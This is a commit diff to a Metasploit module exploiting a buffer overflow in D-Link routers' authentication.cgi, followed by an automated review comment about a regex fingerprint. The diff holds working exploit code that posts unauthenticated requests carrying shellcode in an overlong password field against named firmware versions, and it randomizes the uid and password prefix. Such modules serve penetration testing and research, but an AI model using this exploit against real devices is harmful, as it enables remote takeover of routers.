Do some randomizations

bug/bundler_fix
jvazquez-r7 2014-06-20 11:38:10 -05:00
parent f26f8ae5db
commit f0d04fe77e
1 changed files with 10 additions and 10 deletions


@ -17,10 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'D-Link authentication.cgi Buffer Overflow', 'Name' => 'D-Link authentication.cgi Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link routers. This module exploits an remote buffer overflow vulnerability on different D-Link routers.
This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated long password values. The vulnerability can be exploitable without authentication. This
environment. They are a little bit different in the first ROP gadget. module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
}, },
'Author' => 'Author' =>
[ [
@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET' 'method' => 'GET'
}) })
if res && [200, 301, 302].include?(res.code) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
@ -113,17 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote
def execute_command(cmd, opts) def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd) shellcode = prepare_shellcode(cmd)
uid = rand_text_alpha(4)
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
#'uri' => "/authentication_gdb.cgi", #for debugging on the router
'uri' => "/authentication.cgi", 'uri' => "/authentication.cgi",
'cookie' => "uid=test", 'cookie' => "uid=#{uid}",
'encode_params' => false, 'encode_params' => false,
'vars_post' => { 'vars_post' => {
'uid' => 'test', 'uid' => uid,
'password' => 'asd' << shellcode, 'password' => rand_text_alpha(3) + shellcode,
} }
}) })
return res return res
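Review bot: In the second hunk, the new fingerprint `res.body.to_s =~ /status.*uid/` on the `if res && ...` line only matches when `status` and `uid` sit on the same line of the body, because `.` does not cross newlines in Ruby without the `m` flag. The response body is not shown on this page, so this is a hedge: if the CGI returns those fields on separate lines, the condition is never true and the method falls through to whatever it returns otherwise, which would under-report affected devices. `res.body.to_s =~ /status.*uid/m` avoids that. A one-line comment above the condition stating which fields the body is expected to carry (for example `# expect a body with "status" and "uid" fields`) would make the fingerprint easier to maintain. The enclosing method starts and ends outside the hunk.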